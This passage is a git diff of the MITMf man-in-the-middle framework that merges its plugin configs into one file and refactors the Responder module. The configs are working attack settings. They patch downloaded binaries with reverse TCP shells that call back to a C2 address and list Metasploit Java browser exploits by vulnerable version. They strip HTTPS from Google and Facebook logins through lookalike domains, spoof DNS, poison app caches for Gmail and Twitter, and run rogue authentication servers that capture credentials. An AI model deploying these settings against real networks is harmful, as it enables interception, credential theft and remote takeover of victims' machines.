diff --git a/README.md b/README.md index a67fa6a..fcb70c1 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,7 @@ This tool is completely based on sergio-proxy https://code.google.com/p/sergio-p Availible plugins: - Responder - LLMNR, NBT-NS and MDNS poisoner +- SSLstrip+ - Partially bypass HSTS - Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries - BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type - AppCachePoison - Perform app cache poison attacks diff --git a/config/app_cache_poison.cfg b/config/app_cache_poison.cfg deleted file mode 100644 index cd23bc3..0000000 --- a/config/app_cache_poison.cfg +++ /dev/null @@ -1,53 +0,0 @@ -[DEFAULT] -; HTML5 AppCache poisioning attack -; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack. -; generic settings for tampering engine - -templates_path=config/app_cache_poison_templates -;enable_only_in_useragents=Chrome|Firefox - -; when visiting first url matching following expression we will embed iframes with all tamper URLs -;(to poison the cache for all of them all at once) -mass_poison_url_match=http://.*prezydent\.pl.* -; it's only useful to mass poison chrome because: -; - it supports iframe sandbox preventing framebusting -; - does not ask for confirmation -mass_poison_useragent_match=Chrome|Safari - -[test] -; any //example.com URL redirects to iana and will display our spoofed content -tamper_url=http://example.com/ -manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!) -templates=test ; which templates to use for spoofing content? -skip_in_mass_poison=1 - -; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here -[gmail] -tamper_url=http://mail.google.com/mail/ -; manifest has to be of last domain in redirect loop -manifest_url=http://mail.google.com/robots.txt -templates=default ; could be omitted - -[facebook] -tamper_url=http://www.facebook.com/ -manifest_url=http://www.facebook.com/robots.txt -templates=facebook ; use different template - -[twitter] -tamper_url=http://twitter.com/ -;tamper_url_match=^http://(www\.)?twitter\.com/$ -manifest_url=http://twitter.com/robots.txt - -[testing] -tamper_url=http://www.html5rocks.com/en/ -manifest_url=http://www.html5rocks.com/robots.txt - -; we can also modify non-HTML URLs to append malicious code to them -; but for them to be cached in HTML5 AppCache they need to be referred in -; manifest for a poisoned domain -; if not, they are "only" cached for 10 years :D -[ga] -raw_url=http://www.google-analytics.com/ga.js -templates=script -skip_in_mass_poison=1 -;you can add other scripts in additional sections like jQuery etc. \ No newline at end of file diff --git a/config/beefautorun.cfg b/config/beefautorun.cfg deleted file mode 100644 index fa84f2d..0000000 --- a/config/beefautorun.cfg +++ /dev/null @@ -1,32 +0,0 @@ -#Example config file for the BeefAutorun plugin - -mode = oneshot -#can be set to loop, or oneshot - -#in loop mode the plugin will run modules on all hooked browsers every 10 seconds -#in oneshot mode the plugin will run modules only once per hooked browser - -[ALL] #Runs specified modules on all hooked browsers - -'Man-In-The-Browser'= '{}' - - -[targets] #Runs specified modules based on OS and Browser type - - [[Windows]] #Target all Windows versions using Firefox and Internet Explorer - - [[[FF]]] - 'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}' - - [[[IE]]] - 'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}' - - [[Windows 7]] #Target only Windows 7 using Chrome - - [[[C]]] - 'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}' - - [[Linux]] #Target Linux platforms using Chrome - - [[[C]]] - 'Redirect Browser (Rickroll)' = '{}' \ No newline at end of file diff --git a/config/dhcp.cfg b/config/dhcp.cfg deleted file mode 100644 index ed4417c..0000000 --- a/config/dhcp.cfg +++ /dev/null @@ -1,4 +0,0 @@ -#Example config file for DHCP spoofing -ip_pool = 192.168.2.10-50 -subnet = 255.255.255.0 -dns_server = 192.168.2.20 #optional diff --git a/config/dns.cfg b/config/dns.cfg deleted file mode 100644 index 816f218..0000000 --- a/config/dns.cfg +++ /dev/null @@ -1,3 +0,0 @@ -#Example config file for DNS tampering -www.facebook.com = 192.168.10.1 -google.com = 192.168.10.1 diff --git a/config/filepwn.cfg b/config/filepwn.cfg deleted file mode 100644 index 929ad64..0000000 --- a/config/filepwn.cfg +++ /dev/null @@ -1,122 +0,0 @@ -""" - BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' - - Author Joshua Pitts the.midnite.runr 'at' gmail com - - Copyright (c) 2013-2014, Joshua Pitts - All rights reserved. - - Redistribution and use in source and binary forms, with or without modification, - are permitted provided that the following conditions are met: - - 1. Redistributions of source code must retain the above copyright notice, - this list of conditions and the following disclaimer. - - 2. Redistributions in binary form must reproduce the above copyright notice, - this list of conditions and the following disclaimer in the documentation - and/or other materials provided with the distribution. - - 3. Neither the name of the copyright holder nor the names of its contributors - may be used to endorse or promote products derived from this software without - specific prior written permission. - - THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE - LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF - SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS - INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN - CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE - POSSIBILITY OF SUCH DAMAGE. - - Tested on Kali-Linux. - -""" - -[ZIP] -# patchCount is the max number of files to patch in a zip file -# After the max is reached it will bypass the rest of the files -# and send on it's way - -patchCount = 5 - -# In Bytes -maxSize = 40000000 - -blacklist = .dll, #don't do dlls in a zip file - -[TAR] -# patchCount is the max number of files to patch in a tar file -# After the max is reached it will bypass the rest of the files -# and send on it's way - -patchCount = 5 - -# In Bytes -maxSize = 40000000 - -blacklist = , # a comma is null do not leave blank - -[targets] - #MAKE SURE that your settings for host and port DO NOT - # overlap between different types of payloads - - [[ALL]] # DEFAULT settings for all targets REQUIRED - - LinuxType = ALL # choices: x86/x64/ALL/None - WindowsType = ALL # choices: x86/x64/ALL/None - FatPriority = x64 # choices: x86 or x64 - - FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large - - CompressedFiles = True #True/False - [[[LinuxIntelx86]]] - SHELL = reverse_shell_tcp # This is the BDF syntax - HOST = 192.168.1.168 # The C2 - PORT = 8888 - SUPPLIED_SHELLCODE = None - MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax - - [[[LinuxIntelx64]]] - SHELL = reverse_shell_tcp - HOST = 192.168.1.16 - PORT = 9999 - SUPPLIED_SHELLCODE = None - MSFPAYLOAD = linux/x64/shell_reverse_tcp - - [[[WindowsIntelx86]]] - PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND - HOST = 192.168.1.16 - PORT = 8443 - SHELL = reverse_shell_tcp - SUPPLIED_SHELLCODE = None - ZERO_CERT = False - PATCH_DLL = True - MSFPAYLOAD = windows/shell_reverse_tcp - - [[[WindowsIntelx64]]] - PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND - HOST = 192.168.1.16 - PORT = 8088 - SHELL = reverse_shell_tcp - SUPPLIED_SHELLCODE = Nonepatchpatchpatch - ZERO_CERT = True - PATCH_DLL = False - MSFPAYLOAD = windows/x64/shell_reverse_tcp - - [[[MachoIntelx86]]] - SHELL = reverse_shell_tcp - HOST = 192.168.1.16 - PORT = 4444 - SUPPLIED_SHELLCODE = None - MSFPAYLOAD = linux/x64/shell_reverse_tcp - - [[[MachoIntelx64]]] - SHELL = reverse_shell_tcp - HOST = 192.168.1.16 - PORT = 5555 - SUPPLIED_SHELLCODE = None - MSFPAYLOAD = linux/x64/shell_reverse_tcp \ No newline at end of file diff --git a/config/hsts_bypass.cfg b/config/hsts_bypass.cfg deleted file mode 100644 index 06d1ece..0000000 --- a/config/hsts_bypass.cfg +++ /dev/null @@ -1,11 +0,0 @@ -#here you can configure your domains to bypass HSTS on -#the format is real.domain.com = fake.domain.com - -#for google and gmail -accounts.google.com = account.google.com -mail.google.com = gmail.google.com -accounts.google.se = cuentas.google.se - -#for facebook -www.facebook.com = social.facebook.com -facebook.com = social.facebook.com \ No newline at end of file diff --git a/config/javapwn.cfg b/config/javapwn.cfg deleted file mode 100644 index b11dc85..0000000 --- a/config/javapwn.cfg +++ /dev/null @@ -1,27 +0,0 @@ -# All versions strings without a * are considered vulnerable if clients Java version is <= update version -# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28 - -[Multi] #Cross platform exploits, yay java! <3 - -multi/browser/java_rhino = 1.6.0.28, 1.7.0.28 -multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16 -multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26 -multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2 -multi/browser/java_jre17_exec = 1.7.0.6 -multi/browser/java_jre17_jaxws = 1.7.0.7 -multi/browser/java_jre17_jmxbean = 1.7.0.10 -multi/browser/java_jre17_jmxbean_2 = 1.7.0.11 -multi/browser/java_jre17_reflection_types = 1.7.0.17 -multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37 -multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7 -multi/browser/java_jre17_method_handle = 1.7.0.7 -multi/browser/java_jre17_driver_manager = 1.7.0.17 -multi/browser/java_jre17_provider_skeleton = 1.7.0.21 -multi/browser/java_storeimagearray = 1.7.0.21 -multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11 - -[Windows] #These are windows specific - -windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7 -windows/browser/java_cmm = 1.6.0.41, 1.7.0.15 -windows/browser/java_mixer_sequencer = 1.6.0.18 diff --git a/config/mitmf.cfg b/config/mitmf.cfg index a42c7fc..f28dc12 100644 --- a/config/mitmf.cfg +++ b/config/mitmf.cfg @@ -1,10 +1,355 @@ -[BeEF] -beefip = 127.0.0.1 -beefport = 3000 -user = beef -pass = beef +#MITMf configuration -[Metasploit] -msfport = 8080 #Port to start webserver for exploits -rpcip = 127.0.0.1 -rpcpass = abc123 \ No newline at end of file +[MITMf] + + #here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory) + args='' + + #Required BeEF and Metasploit options + [[BeEF]] + beefip = 127.0.0.1 + beefport = 3000 + user = beef + pass = beef + + [[Metasploit]] + msfport = 8080 #Port to start webserver for exploits + rpcip = 127.0.0.1 + rpcpass = abc123 + +#-----------------------------------------------------------------------------------------------------------------------------------------# + +#Plugin configuration starts here + +[Spoof] + + [[DHCP]] + ip_pool = 192.168.2.10-50 + subnet = 255.255.255.0 + dns_server = 192.168.2.20 #optional + + [[DNS]] + www.facebook.com = 192.168.10.1 + google.com = 192.168.10.1 + + +[Responder] + + #Set these values to On or Off, so you can control which rogue authentication server is turned on. + SQL = On + SMB = On + Kerberos = On + FTP = On + POP = On + ##Listen on 25/TCP, 587/TCP + SMTP = On + IMAP = On + HTTP = On + HTTPS = On + DNS = On + LDAP = On + + #Set a custom challenge + Challenge = 1122334455667788 + + #Set this to change the default logging file + SessionLog = Responder-Session.log + + #Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 + #RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 + RespondTo = + #Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT + #RespondTo = WPAD,DEV,PROD,SQLINT + RespondToName = + + #DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 + DontRespondTo = + #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS + DontRespondToName = + + [[HTTP Server]] + + #Set this to On if you want to always serve a specific file to the victim. + Serve-Always = Off + + #Set this to On if you want to serve an executable file each time a .exe is detected in an URL. + Serve-Exe = Off + + #Uncomment and specify a custom file to serve, the file must exist. + Filename = config/responder/Denied.html + + #Specify a custom executable file to serve, the file must exist. + ExecFilename = config/responder/FixInternet.exe + + #Set your custom PAC script + WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}' + + [[HTTPS Server]] + + #Change to use your certs + cert = config/responder/certs/responder.crt + key = config/responder/certs/responder.key + + +[BeEFAutorun] + #Example config for the BeefAutorun plugin + + mode = oneshot + #can be set to loop, or oneshot + + #in loop mode the plugin will run modules on all hooked browsers every 10 seconds + #in oneshot mode the plugin will run modules only once per hooked browser + + [[ALL]] #Runs specified modules on all hooked browsers + + 'Man-In-The-Browser'= '{}' + + [[targets]] #Runs specified modules based on OS and Browser type + + [[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer + + [[[[FF]]]] + 'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}' + + [[[[IE]]]] + 'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}' + + [[[Windows 7]]] #Target only Windows 7 using Chrome + + [[[[C]]]] + 'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}' + + [[[Linux]]] #Target Linux platforms using Chrome + + [[[[C]]]] + 'Redirect Browser (Rickroll)' = '{}' + +[AppCachePoison] + # HTML5 AppCache poisioning attack + # see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack. + # generic settings for tampering engine + + #enable_only_in_useragents=Chrome|Firefox + + templates_path=config/app_cache_poison_templates + + # when visiting first url matching following expression we will embed iframes with all tamper URLs + #(to poison the cache for all of them all at once) + + mass_poison_url_match=http://.*prezydent\.pl.* + + # it's only useful to mass poison chrome because: + # - it supports iframe sandbox preventing framebusting + # - does not ask for confirmation + + mass_poison_useragent_match=Chrome|Safari + + [[test]] + # any //example.com URL redirects to iana and will display our spoofed content + + tamper_url=http://example.com/ + manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!) + templates=test # which templates to use for spoofing content? + skip_in_mass_poison=1 + + [[gmail]] + #use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here + + tamper_url=http://mail.google.com/mail/ + + # manifest has to be of last domain in redirect loop + + manifest_url=http://mail.google.com/robots.txt + templates=default # could be omitted + + [[facebook]] + tamper_url=http://www.facebook.com/ + manifest_url=http://www.facebook.com/robots.txt + templates=facebook # use different template + + [[twitter]] + tamper_url=http://twitter.com/ + #tamper_url_match=^http://(www\.)?twitter\.com/$ + manifest_url=http://twitter.com/robots.txt + + [[testing]] + tamper_url=http://www.html5rocks.com/en/ + manifest_url=http://www.html5rocks.com/robots.txt + + [[ga]] + # we can also modify non-HTML URLs to append malicious code to them + # but for them to be cached in HTML5 AppCache they need to be referred in + # manifest for a poisoned domain + # if not, they are "only" cached for 10 years :D + + raw_url=http://www.google-analytics.com/ga.js + templates=script + skip_in_mass_poison=1 + #you can add other scripts in additional sections like jQuery etc. + +[JavaPwn] + # All versions strings without a * are considered vulnerable if clients Java version is <= update version + # When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28 + + [[Multi]] #Cross platform exploits, yay java! <3 + + multi/browser/java_rhino = 1.6.0.28, 1.7.0.28 + multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16 + multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26 + multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2 + multi/browser/java_jre17_exec = 1.7.0.6 + multi/browser/java_jre17_jaxws = 1.7.0.7 + multi/browser/java_jre17_jmxbean = 1.7.0.10 + multi/browser/java_jre17_jmxbean_2 = 1.7.0.11 + multi/browser/java_jre17_reflection_types = 1.7.0.17 + multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37 + multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7 + multi/browser/java_jre17_method_handle = 1.7.0.7 + multi/browser/java_jre17_driver_manager = 1.7.0.17 + multi/browser/java_jre17_provider_skeleton = 1.7.0.21 + multi/browser/java_storeimagearray = 1.7.0.21 + multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11 + + [[Windows]] #These are windows specific + + windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7 + windows/browser/java_cmm = 1.6.0.41, 1.7.0.15 + windows/browser/java_mixer_sequencer = 1.6.0.18 + +[SSLstrip+] + #here you can configure your domains to bypass HSTS on + #the format is real.domain.com = fake.domain.com + + #for google and gmail + accounts.google.com = account.google.com + mail.google.com = gmail.google.com + accounts.google.se = cuentas.google.se + + #for facebook + www.facebook.com = social.facebook.com + facebook.com = social.facebook.com + +#-----------------------------------------------------------------------------------------------------------------------------------------# + +# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something' +# +# Author Joshua Pitts the.midnite.runr 'at' gmail com +# +# Copyright (c) 2013-2014, Joshua Pitts +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without modification, +# are permitted provided that the following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# +# 2. Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# +# 3. Neither the name of the copyright holder nor the names of its contributors +# may be used to endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +# POSSIBILITY OF SUCH DAMAGE. +# +# Tested on Kali-Linux. + +#-----------------------------------------------------------------------------------------------------------------------------------------# + +[FilePwn] + [[ZIP]] + # patchCount is the max number of files to patch in a zip file + # After the max is reached it will bypass the rest of the files + # and send on it's way + + patchCount = 5 + + # In Bytes + maxSize = 40000000 + + blacklist = .dll, #don't do dlls in a zip file + + [[TAR]] + # patchCount is the max number of files to patch in a tar file + # After the max is reached it will bypass the rest of the files + # and send on it's way + + patchCount = 5 + + # In Bytes + maxSize = 40000000 + + blacklist = , # a comma is null do not leave blank + + [[targets]] + #MAKE SURE that your settings for host and port DO NOT + # overlap between different types of payloads + + [[[ALL]]] # DEFAULT settings for all targets REQUIRED + + LinuxType = ALL # choices: x86/x64/ALL/None + WindowsType = ALL # choices: x86/x64/ALL/None + FatPriority = x64 # choices: x86 or x64 + + FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large + + CompressedFiles = True #True/False + [[[[LinuxIntelx86]]]] + SHELL = reverse_shell_tcp # This is the BDF syntax + HOST = 192.168.1.168 # The C2 + PORT = 8888 + SUPPLIED_SHELLCODE = None + MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax + + [[[[LinuxIntelx64]]]] + SHELL = reverse_shell_tcp + HOST = 192.168.1.16 + PORT = 9999 + SUPPLIED_SHELLCODE = None + MSFPAYLOAD = linux/x64/shell_reverse_tcp + + [[[[WindowsIntelx86]]]] + PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND + HOST = 192.168.1.16 + PORT = 8443 + SHELL = reverse_shell_tcp + SUPPLIED_SHELLCODE = None + ZERO_CERT = False + PATCH_DLL = True + MSFPAYLOAD = windows/shell_reverse_tcp + + [[[[WindowsIntelx64]]]] + PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND + HOST = 192.168.1.16 + PORT = 8088 + SHELL = reverse_shell_tcp + SUPPLIED_SHELLCODE = Nonepatchpatchpatch + ZERO_CERT = True + PATCH_DLL = False + MSFPAYLOAD = windows/x64/shell_reverse_tcp + + [[[[MachoIntelx86]]]] + SHELL = reverse_shell_tcp + HOST = 192.168.1.16 + PORT = 4444 + SUPPLIED_SHELLCODE = None + MSFPAYLOAD = linux/x64/shell_reverse_tcp + + [[[[MachoIntelx64]]]] + SHELL = reverse_shell_tcp + HOST = 192.168.1.16 + PORT = 5555 + SUPPLIED_SHELLCODE = None + MSFPAYLOAD = linux/x64/shell_reverse_tcp \ No newline at end of file diff --git a/config/replace.cfg b/config/replace.cfg deleted file mode 100644 index e69de29..0000000 diff --git a/config/responder/responder.conf b/config/responder/responder.conf deleted file mode 100644 index ed33a0e..0000000 --- a/config/responder/responder.conf +++ /dev/null @@ -1,59 +0,0 @@ -[Responder Core] -;; -;Set these values to On or Off, so you can control which rogue authentication server is turned on. -SQL = On -SMB = On -Kerberos = On -FTP = On -POP = On -;;Listen on 25/TCP, 587/TCP -SMTP = On -IMAP = On -HTTP = On -HTTPS = On -DNS = On -LDAP = On -; -;Set a custom challenge -Challenge = 1122334455667788 -; -;Set this to change the default logging file -SessionLog = Responder-Session.log -; -;Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 -;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 -RespondTo = -;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT -;RespondTo = WPAD,DEV,PROD,SQLINT -RespondToName = -; -;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 -DontRespondTo = -;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS -DontRespondToName = -; -[HTTP Server] -;; -;Set this to On if you want to always serve a specific file to the victim. -Serve-Always = Off -; -;Set this to On if you want to serve an executable file each time a .exe is detected in an URL. -Serve-Exe = Off -; -;Uncomment and specify a custom file to serve, the file must exist. -Filename = config/responder/Denied.html -; -;Specify a custom executable file to serve, the file must exist. -ExecFilename = config/responder/FixInternet.exe -; -;Set your custom PAC script -WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';} -; -[HTTPS Server] -; -;Change to use your certs -cert = config/responder/certs/responder.crt -key = config/responder/certs/responder.key -; - - diff --git a/libs/responder/Responder.py b/libs/responder/Responder.py index e5a6370..4bebcac 100755 --- a/libs/responder/Responder.py +++ b/libs/responder/Responder.py @@ -16,7 +16,7 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . -import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string, time +import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,BaseHTTPServer, select,urlparse,zlib, string, time from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer from Fingerprint import RunSmbFinger,OsNameClientVersion from odict import OrderedDict @@ -24,45 +24,6 @@ from socket import inet_aton from random import randrange from libs.sslstrip.DnsCache import DnsCache -VERSION = '2.1.2' - -#Config parsing -config = ConfigParser.ConfigParser() -config.read("./config/responder/responder.conf") - -# Set some vars. -On_Off = config.get('Responder Core', 'HTTP').upper() -SSL_On_Off = config.get('Responder Core', 'HTTPS').upper() -SMB_On_Off = config.get('Responder Core', 'SMB').upper() -SQL_On_Off = config.get('Responder Core', 'SQL').upper() -FTP_On_Off = config.get('Responder Core', 'FTP').upper() -POP_On_Off = config.get('Responder Core', 'POP').upper() -IMAP_On_Off = config.get('Responder Core', 'IMAP').upper() -SMTP_On_Off = config.get('Responder Core', 'SMTP').upper() -LDAP_On_Off = config.get('Responder Core', 'LDAP').upper() -DNS_On_Off = config.get('Responder Core', 'DNS').upper() -Krb_On_Off = config.get('Responder Core', 'Kerberos').upper() -NumChal = config.get('Responder Core', 'Challenge') -SessionLog = config.get('Responder Core', 'SessionLog') -Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper() -Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper() -FILENAME = config.get('HTTP Server', 'Filename') -WPAD_Script = config.get('HTTP Server', 'WPADScript') -#HTMLToServe = config.get('HTTP Server', 'HTMLToServe') -RespondTo = config.get('Responder Core', 'RespondTo').strip() -RespondTo.split(",") -RespondToName = config.get('Responder Core', 'RespondToName').strip() -RespondToName.split(",") -DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip() -DontRespondTo.split(",") -DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip() -DontRespondToName.split(",") - -HTMLToServe = '' - -if len(NumChal) is not 16: - sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n") - def IsOsX(): Os_version = sys.platform if Os_version == "darwin": @@ -151,11 +112,6 @@ def PrintLLMNRNBTNS(outfile,Message): return True -# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident. -Challenge = "" -for i in range(0,len(NumChal),2): - Challenge += NumChal[i:i+2].decode("hex") - #Packet class handling all packet generation (see odict.py). class Packet(): fields = OrderedDict([ @@ -2021,8 +1977,8 @@ class SSlSock(ThreadingMixIn, TCPServer): def __init__(self, server_address, RequestHandlerClass): BaseServer.__init__(self, server_address, RequestHandlerClass) ctx = SSL.Context(SSL.SSLv3_METHOD) - cert = config.get('HTTPS Server', 'cert') - key = config.get('HTTPS Server', 'key') + cert = SSLcert + key = SSLkey ctx.use_privatekey_file(key) ctx.use_certificate_file(cert) self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type)) @@ -2483,7 +2439,51 @@ def serve_thread_SSL(host, port, handler): except Exception, e: print "[-] Error starting TCP server on port " + str(port) + ": " + str(e) -def start_responder(options, ip_address): +def start_responder(options, ip_address, config): + + global VERSION; VERSION = '2.1.2' + + # Set some vars. + global On_Off; On_Off = config['HTTP'].upper() + global SSL_On_Off; SSL_On_Off = config['HTTPS'].upper() + global SMB_On_Off; SMB_On_Off = config['SMB'].upper() + global SQL_On_Off; SQL_On_Off = config['SQL'].upper() + global FTP_On_Off; FTP_On_Off = config['FTP'].upper() + global POP_On_Off; POP_On_Off = config['POP'].upper() + global IMAP_On_Off; IMAP_On_Off = config['IMAP'].upper() + global SMTP_On_Off; SMTP_On_Off = config['SMTP'].upper() + global LDAP_On_Off; LDAP_On_Off = config['LDAP'].upper() + global DNS_On_Off; DNS_On_Off = config['DNS'].upper() + global Krb_On_Off; Krb_On_Off = config['Kerberos'].upper() + global NumChal; NumChal = config['Challenge'] + global SessionLog; SessionLog = config['SessionLog'] + global Exe_On_Off; Exe_On_Off = config['HTTP Server']['Serve-Exe'].upper() + global Exec_Mode_On_Off; Exec_Mode_On_Off = config['HTTP Server']['Serve-Always'].upper() + global FILENAME; FILENAME = config['HTTP Server']['Filename'] + global WPAD_Script; WPAD_Script = config['HTTP Server']['WPADScript'] + #HTMLToServe = config.get('HTTP Server', 'HTMLToServe') + + global SSLcert; SSLcert = config['HTTPS Server']['cert'] + global SSLkey; SSLkey = config['HTTPS Server']['key'] + + global RespondTo; RespondTo = config['RespondTo'].strip() + RespondTo.split(",") + global RespondToName; RespondToName = config['RespondToName'].strip() + RespondToName.split(",") + global DontRespondTo; DontRespondTo = config['DontRespondTo'].strip() + DontRespondTo.split(",") + global DontRespondToName; DontRespondToName = config['DontRespondToName'].strip() + DontRespondToName.split(",") + + HTMLToServe = '' + + if len(NumChal) is not 16: + sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n") + + # Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident. + global Challange; Challenge = "" + for i in range(0,len(NumChal),2): + Challenge += NumChal[i:i+2].decode("hex") #Cli options. global OURIP; OURIP = ip_address diff --git a/libs/sslstrip/URLMonitor.py b/libs/sslstrip/URLMonitor.py index 03acacd..794be83 100644 --- a/libs/sslstrip/URLMonitor.py +++ b/libs/sslstrip/URLMonitor.py @@ -18,7 +18,6 @@ import re, os import logging -from configobj import ConfigObj class URLMonitor: @@ -44,12 +43,7 @@ class URLMonitor: self.redirects = [] self.faviconReplacement = False self.hsts = False - - hsts_config = 